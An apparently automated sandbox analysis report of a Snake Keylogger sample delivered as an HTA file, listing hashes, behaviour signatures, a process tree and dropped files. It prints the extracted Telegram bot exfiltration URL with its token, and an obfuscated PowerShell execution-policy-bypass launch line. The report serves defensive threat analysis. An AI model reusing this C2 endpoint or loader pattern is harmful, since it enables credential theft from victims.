Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    17-10-2024 12:23

General

  • Target
    wethinkaboutthegreatsolutionforgreat.hta
  • Size
    129KB
  • MD5
    7a368478a9772fc6e87e8eda7ec7f7b3
  • SHA1
    237eff7ffb66ca9507fdbd5512506ef4cf81a22d
  • SHA256
    7e041a3670abd581eb735dab3a66975fafd7e921bb0f94a36b98829248462f8b
  • SHA512
    114aa191194efec173adc3ab137eab58454854efa5109da30364b54108a74ccf68b66c659a9609ece5933aa72ab5997f7b93e510e37a51ebed51d903cbc4fe17
  • SSDEEP
    96:Eam73EjaILjaeRVfr+ZqTF1OF3ja3jalHjaj7T:Ea23EuauoVj+IGu3u1uPT

Malware Config

Extracted

  • Family
    snakekeylogger
  • C2
    https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wethinkaboutthegreatsolutionforgreat.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\SysWOW64\WINdOWspoWeRsHELL\V1.0\POWERShELl.ExE
      "C:\Windows\SYSTeM32\WINdOWspoWeRsHELL\V1.0\POWERShELl.ExE" "PoWErsHElL -ex bYPass -nop -W 1 -c DEViCEcrEDEntiALDepLOYMEnT ; Iex($(ieX('[sYStEm.tExT.eNcodiNg]'+[char]0X3A+[char]0X3A+'UtF8.GeTstriNG([SySteM.coNverT]'+[chAr]58+[Char]58+'FROmBaSe64STring('+[CHaR]34+'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'+[chaR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nop -W 1 -c DEViCEcrEDEntiALDepLOYMEnT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2804
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5m13dxof.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF5E4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF5D4.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2256
      • C:\Users\Admin\AppData\Roaming\taskhostws.exe
        "C:\Users\Admin\AppData\Roaming\taskhostws.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2044
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostws.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1880

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\5m13dxof.dll
    Filesize: 3KB
    MD5: 0cf76568dadfefbb0c1e4cfd8fca5b49
    SHA1: 930830e6687448aaee50d2d215f24b2a16148552
    SHA256: f8d335fcbf9558ff5ee7c878c3a113d1087e8b4ffe08a1500613a9152c057142
    SHA512: c6764cf9eaeda5c9288a9ba53b3c3052830cf60335799ee8fcb8e3ce787f5f71ab0bc30d3da9021891738004d5c584adbb54bceee136cd7f4bdd3bd7bd07ba9b

  • C:\Users\Admin\AppData\Local\Temp\5m13dxof.pdb
    Filesize: 7KB
    MD5: 8eab07f53d94073a46e3f06a7fd39a34
    SHA1: 984c4eeef449abfa446f2aa317bcd57cb2b9e583
    SHA256: db14b1fe7bd042256328f3ee3c3e94d0c0916089bbe5592b848dbee3612cfaeb
    SHA512: adc0b75bbf1110caf025e7e7c8e0cf15b77fb06729a53755414e0e9e73f74ea82e1d074627a6ce5c04aa3e9f98cff47d5c2874ef1017aa12ea471825d7dcf57e

  • C:\Users\Admin\AppData\Local\Temp\RESF5E4.tmp
    Filesize: 1KB
    MD5: 86ea811e6931f0600efa5a75b73e27a9
    SHA1: 5096344062a6d36b919035153736e420405b2eec
    SHA256: da4e0ca9a542804d238592e83c13d199516a40921188a16e847728d35164b662
    SHA512: e054b229d6af1f7986815efd0ae26e566ad9f9ceb765f2d78396c03b7b486ed16923a2e43b21d574574303e946ef0bab038572e87ba97488ae8ea10d3acd8f01

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize: 7KB
    MD5: 6085be2c24c443d93e96b1d0f657ec34
    SHA1: 195929fab117f2320166fe9178dcd92432f344df
    SHA256: 184221735cfdbd418ec9e5113dfb88c1c04a23ba8e3806c844bd35af50a20e64
    SHA512: 849058cfee01fd8aa06ca0c8c6f33ef97b0df34d018e929c17c3a608ef28a42e7c1c16f16422f947ba966ac393930f974af75f493cd780e1b339fdfddfaec09f

  • C:\Users\Admin\AppData\Roaming\taskhostws.exe
    Filesize: 938KB
    MD5: b47e4f366b08fe509c2a8f9ee7251f51
    SHA1: 3338dd3e335d1e8e6ee0d4c0c607248d333c25c1
    SHA256: 03461c2a07431aed5ff68bbcf42d7ef82f32190b44ba140befd3f474614b5f3d
    SHA512: 277032b371ca4992657c172995186b4593197a91c784e84b1b5652478d462b84792e8b10480ecf0eb05e4ce4130575c59f0f14d197d4e0d77c70c0bd6989aaec

  • \??\c:\Users\Admin\AppData\Local\Temp\5m13dxof.0.cs
    Filesize: 460B
    MD5: 7d449c3b022ff885a410d7d58f117516
    SHA1: 5a4642c0a7a8745d9aad5243fa3dbdfa42fcd01c
    SHA256: d82eab2c4860d52330cd6aefa6051d4b53566de18f6665b1140d59d79fd436e5
    SHA512: 3683fb94132803f56fbb7188f51c097c59a4c2297cd66e88571836d4b040ae8b15cafee7f2ce747f1cc8326a8144b4e0c262bd954211adc9d65c70f9e8c645d3

  • \??\c:\Users\Admin\AppData\Local\Temp\5m13dxof.cmdline
    Filesize: 309B
    MD5: 5d154e184f893d69cf6da6f677c32a05
    SHA1: 4865ee0c2b2559d32e8b9926c8b06ab6d2ca81f2
    SHA256: ac3716f84f903788af05ca839c15bc352dc26032c73bf53facb7b7711287e7a9
    SHA512: 0524a4214aeae19b7cdcca31350267f071349b9c7438a492fa866222d9eaafd479ed2d44abffc2d223761d1c2ede27ffa84f1a67ae8c06267c1fac09e00b5f15

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF5D4.tmp
    Filesize: 652B
    MD5: e10feae979444bf34c133e4cdeadfd13
    SHA1: f48f8d4660ee76deb2c2eb994a64d729fd09a2b9
    SHA256: 593471bdb3c27ad9a44dc23f93d29002db5a85e38c2b1910d3b71b1649072567
    SHA512: ca7206519331eec58b309d14bb2a65d7b8e965fef2858411fbd6a4ebc9e8f0449eb2d4aa065d5143f5038aac66c20fb878a503a491c21ac401fb164cca1c13dd

  • memory/1880-34-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize: 152KB

  • memory/1880-35-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize: 152KB

  • memory/1880-36-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize: 152KB